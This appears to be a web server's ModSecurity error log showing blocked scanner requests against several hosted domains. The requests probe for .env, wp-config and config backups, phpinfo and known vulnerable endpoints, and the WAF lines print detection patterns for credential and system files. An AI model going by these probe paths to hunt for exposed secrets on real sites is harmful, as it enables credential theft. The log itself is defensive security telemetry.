[Tue May 26 15:13:45.853711 2026] [security2:error] [pid 686593:tid 686730] [client 45.148.10.62:41918] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/.env"] [unique_id "ahVrUeilgkZcvx0_tl_DCQAAAIw"]
[Tue May 26 15:13:46.055852 2026] [security2:error] [pid 686593:tid 686823] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrUeilgkZcvx0_tl_C_wAAAOk"]
[Tue May 26 15:13:46.151467 2026] [security2:error] [pid 686593:tid 686777] [client 45.148.10.62:41910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env"] [unique_id "ahVrUuilgkZcvx0_tl_DEQAAALs"]
[Tue May 26 15:13:46.303598 2026] [security2:error] [pid 686593:tid 686764] [client 45.148.10.62:41910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env.bak"] [unique_id "ahVrUuilgkZcvx0_tl_DJAAAAK4"]
[Tue May 26 15:13:46.307219 2026] [security2:error] [pid 686593:tid 686766] [client 45.148.10.62:41988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/.env.bak"] [unique_id "ahVrUuilgkZcvx0_tl_DJQAAALA"]
[Tue May 26 15:13:46.477397 2026] [security2:error] [pid 686593:tid 686774] [client 23.94.40.119:33456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/dashboard/uploadID.php"] [unique_id "ahVrUuilgkZcvx0_tl_DKwAAALg"]
[Tue May 26 15:13:46.533146 2026] [security2:error] [pid 686593:tid 686753] [client 23.94.40.119:33458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/pandora_console/index.php"] [unique_id "ahVrUuilgkZcvx0_tl_DLAAAAKM"]
[Tue May 26 15:13:46.761136 2026] [security2:error] [pid 686593:tid 686830] [client 45.148.10.62:41988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/backend/.env"] [unique_id "ahVrUuilgkZcvx0_tl_DNgAAAPA"]
[Tue May 26 15:13:46.762789 2026] [security2:error] [pid 686593:tid 686734] [client 45.148.10.62:41910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/backend/.env"] [unique_id "ahVrUuilgkZcvx0_tl_DNwAAAJA"]
[Tue May 26 15:13:46.910533 2026] [security2:error] [pid 686593:tid 686742] [client 45.148.10.62:41988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/test.php"] [unique_id "ahVrUuilgkZcvx0_tl_DOQAAAJg"]
[Tue May 26 15:13:46.914334 2026] [security2:error] [pid 686593:tid 686771] [client 45.148.10.62:41910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/test.php"] [unique_id "ahVrUuilgkZcvx0_tl_DOgAAALU"]
[Tue May 26 15:13:46.929568 2026] [security2:error] [pid 686593:tid 686849] [client 23.94.40.119:33498] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "232"] [id "900331"] [msg "Joomla Com_Content SQL Injection POST"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVrUuilgkZcvx0_tl_DOwAAAQM"]
[Tue May 26 15:13:46.961700 2026] [security2:error] [pid 686593:tid 686836] [client 23.94.40.119:33500] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/woocommerce-abandoned-cart/readme.txt"] [unique_id "ahVrUuilgkZcvx0_tl_DPAAAAPY"]
[Tue May 26 15:13:47.057005 2026] [security2:error] [pid 686593:tid 686814] [client 23.94.40.119:33510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/pandora_console/index.php"] [unique_id "ahVrU-ilgkZcvx0_tl_DRAAAAOA"]
[Tue May 26 15:13:47.204949 2026] [security2:error] [pid 686593:tid 686793] [client 45.148.10.62:41998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/.env.backup"] [unique_id "ahVrU-ilgkZcvx0_tl_DRgAAAMs"]
[Tue May 26 15:13:47.217213 2026] [security2:error] [pid 686593:tid 686787] [client 45.148.10.62:41938] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env.backup"] [unique_id "ahVrU-ilgkZcvx0_tl_DRwAAAMU"]
[Tue May 26 15:13:47.351568 2026] [security2:error] [pid 686593:tid 686743] [client 45.148.10.62:41998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/.env.orig"] [unique_id "ahVrU-ilgkZcvx0_tl_DTQAAAJk"]
[Tue May 26 15:13:47.367223 2026] [security2:error] [pid 686593:tid 686738] [client 45.148.10.62:41938] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env.orig"] [unique_id "ahVrU-ilgkZcvx0_tl_DTwAAAJQ"]
[Tue May 26 15:13:47.498243 2026] [security2:error] [pid 686593:tid 686811] [client 45.148.10.62:41998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/.env.old"] [unique_id "ahVrU-ilgkZcvx0_tl_DUAAAAN0"]
[Tue May 26 15:13:47.518342 2026] [security2:error] [pid 686593:tid 686795] [client 45.148.10.62:41938] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env.old"] [unique_id "ahVrU-ilgkZcvx0_tl_DUQAAAM0"]
[Tue May 26 15:13:47.790229 2026] [security2:error] [pid 686593:tid 686735] [client 45.148.10.62:41998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/.env.php.bak"] [unique_id "ahVrU-ilgkZcvx0_tl_DYgAAAJE"]
[Tue May 26 15:13:47.817250 2026] [security2:error] [pid 686593:tid 686848] [client 45.148.10.62:41938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/.env.php.bak"] [unique_id "ahVrU-ilgkZcvx0_tl_DZQAAAQI"]
[Tue May 26 15:13:47.935789 2026] [security2:error] [pid 686593:tid 686781] [client 45.148.10.62:42034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/.env.php"] [unique_id "ahVrU-ilgkZcvx0_tl_DaQAAAL8"]
[Tue May 26 15:13:47.964501 2026] [security2:error] [pid 686593:tid 686751] [client 45.148.10.62:41956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/.env.php"] [unique_id "ahVrU-ilgkZcvx0_tl_DbAAAAKE"]
[Tue May 26 15:13:48.055869 2026] [security2:error] [pid 686593:tid 686761] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrU-ilgkZcvx0_tl_DVAAAAKs"]
[Tue May 26 15:13:49.012252 2026] [security2:error] [pid 686593:tid 686748] [client 45.148.10.62:41964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php"] [unique_id "ahVrVeilgkZcvx0_tl_DmgAAAJ4"]
[Tue May 26 15:13:49.213619 2026] [security2:error] [pid 686593:tid 686708] [remote 95.216.117.13:57420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVrVeilgkZcvx0_tl_DmwAAiXI"]
[Tue May 26 15:13:49.493856 2026] [fcgid:warn] [pid 686593:tid 686770] (70014)End of file found: [client 66.132.224.223:14548] mod_fcgid: can't get data from http client
[Tue May 26 15:13:49.738336 2026] [security2:error] [pid 686593:tid 686805] [client 45.148.10.62:56366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/wp-config.php"] [unique_id "ahVrVeilgkZcvx0_tl_DtwAAANc"]
[Tue May 26 15:13:49.763920 2026] [security2:error] [pid 686593:tid 686831] [client 45.148.10.62:56370] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.old"] [unique_id "ahVrVeilgkZcvx0_tl_DuAAAAPE"]
[Tue May 26 15:13:49.934023 2026] [security2:error] [pid 686593:tid 686743] [client 89.221.204.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVrVeilgkZcvx0_tl_DwAAAAJk"], referer: https://anujtradingco.com
[Tue May 26 15:13:50.220118 2026] [security2:error] [pid 686593:tid 686845] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrVeilgkZcvx0_tl_DuwAAAP8"]
[Tue May 26 15:13:50.362174 2026] [security2:error] [pid 686593:tid 686768] [client 45.148.10.62:56378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/config.php"] [unique_id "ahVrVuilgkZcvx0_tl_D0AAAALI"]
[Tue May 26 15:13:50.984089 2026] [security2:error] [pid 686593:tid 686760] [client 45.148.10.62:56384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/config.php.bak"] [unique_id "ahVrVuilgkZcvx0_tl_D4wAAAKo"]
[Tue May 26 15:13:51.337647 2026] [security2:error] [pid 686593:tid 686842] [client 45.148.10.62:56394] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/wp-config.php.old"] [unique_id "ahVrV-ilgkZcvx0_tl_D6gAAAPw"]
[Tue May 26 15:13:51.942688 2026] [security2:error] [pid 686593:tid 686730] [client 45.148.10.62:56426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/config.php"] [unique_id "ahVrV-ilgkZcvx0_tl_D_QAAAIw"]
[Tue May 26 15:13:52.068100 2026] [security2:error] [pid 686593:tid 686812] [client 45.148.10.62:56410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/phpinfo.php"] [unique_id "ahVrWOilgkZcvx0_tl_EAwAAAN4"]
[Tue May 26 15:13:52.394235 2026] [security2:error] [pid 686593:tid 686746] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrV-ilgkZcvx0_tl_D_gAAAJw"]
[Tue May 26 15:13:52.409685 2026] [security2:error] [pid 686593:tid 686740] [client 45.148.10.62:56430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/config.php.bak"] [unique_id "ahVrWOilgkZcvx0_tl_EDwAAAJY"]
[Tue May 26 15:13:53.322564 2026] [security2:error] [pid 686593:tid 686805] [client 45.148.10.62:56442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/phpinfo.php"] [unique_id "ahVrWeilgkZcvx0_tl_EKQAAANc"]
[Tue May 26 15:13:53.846569 2026] [security2:error] [pid 686593:tid 686803] [client 23.94.40.119:44022] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/rest/tinymce/1/macro/preview"] [unique_id "ahVrWeilgkZcvx0_tl_EPgAAANU"], referer: webmail.pronumbers.com.au
[Tue May 26 15:13:53.853577 2026] [security2:error] [pid 686593:tid 686743] [client 2.57.122.173:37564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.anujoverseas.anujtradingco.com"] [uri "/.env"] [unique_id "ahVrWeilgkZcvx0_tl_EPwAAAJk"]
[Tue May 26 15:13:54.457093 2026] [security2:error] [pid 686593:tid 686843] [client 23.94.40.119:44042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/objects/getImage.php"] [unique_id "ahVrWuilgkZcvx0_tl_EVgAAAP0"]
[Tue May 26 15:13:54.517778 2026] [security2:error] [pid 686593:tid 686826] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrWuilgkZcvx0_tl_ERgAAAOw"]
[Tue May 26 15:13:54.723688 2026] [security2:error] [pid 686593:tid 686778] [client 114.119.155.83:60349] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVrWuilgkZcvx0_tl_EXgAAALw"], referer: http://glorodavionics.com/index.php?route=affiliate/forgotten
[Tue May 26 15:13:54.731480 2026] [security2:error] [pid 686593:tid 686759] [client 23.94.40.119:44050] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/node/1"] [unique_id "ahVrWuilgkZcvx0_tl_EXwAAAKk"]
[Tue May 26 15:13:54.806508 2026] [security2:error] [pid 686593:tid 686752] [client 85.121.240.156:33876] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVrWuilgkZcvx0_tl_EWgAAAKI"]
[Tue May 26 15:13:54.970712 2026] [security2:error] [pid 686593:tid 686846] [client 23.94.40.119:44078] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/adxmlrpc.php"] [unique_id "ahVrWuilgkZcvx0_tl_EaQAAAQA"]
[Tue May 26 15:13:55.079049 2026] [security2:error] [pid 686593:tid 686789] [client 23.94.40.119:44058] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/total-donations/readme.txt"] [unique_id "ahVrW-ilgkZcvx0_tl_EcAAAAMc"]
[Tue May 26 15:13:55.223575 2026] [proxy:error] [pid 686593:tid 686824] (32)Broken pipe: [client 23.94.40.119:44066] AH01084: pass request body failed to 127.0.0.1:2095 (127.0.0.1)
[Tue May 26 15:13:55.223593 2026] [proxy_http:error] [pid 686593:tid 686824] [client 23.94.40.119:44066] AH01097: pass request body failed to 127.0.0.1:2095 (127.0.0.1) from 23.94.40.119 ()
[Tue May 26 15:13:55.269380 2026] [security2:error] [pid 686593:tid 686812] [client 23.94.40.119:44086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/objects/getImageMP4.php"] [unique_id "ahVrW-ilgkZcvx0_tl_EewAAAN4"]
[Tue May 26 15:13:55.360676 2026] [proxy_http:error] [pid 686593:tid 686824] [client 23.94.40.119:44066] AH01086: read less bytes of request body than expected (got 91208, expected 142842)
[Tue May 26 15:13:55.360689 2026] [proxy_http:error] [pid 686593:tid 686824] [client 23.94.40.119:44066] AH01097: pass request body failed to 127.0.0.1:2095 (127.0.0.1) from 23.94.40.119 ()
[Tue May 26 15:13:55.370266 2026] [security2:error] [pid 686593:tid 686783] [client 23.94.40.119:44114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/objects/getImageMP4.php"] [unique_id "ahVrW-ilgkZcvx0_tl_EhQAAAME"]
[Tue May 26 15:13:55.370395 2026] [security2:error] [pid 686593:tid 686784] [client 23.94.40.119:44098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/objects/getSpiritsFromVideo.php"] [unique_id "ahVrW-ilgkZcvx0_tl_EhAAAAMI"]
[Tue May 26 15:13:55.435458 2026] [proxy:error] [pid 686593:tid 686755] (32)Broken pipe: [client 23.94.40.119:44070] AH01084: pass request body failed to 127.0.0.1:2095 (127.0.0.1)
[Tue May 26 15:13:55.435484 2026] [proxy_http:error] [pid 686593:tid 686755] [client 23.94.40.119:44070] AH01097: pass request body failed to 127.0.0.1:2095 (127.0.0.1) from 23.94.40.119 ()
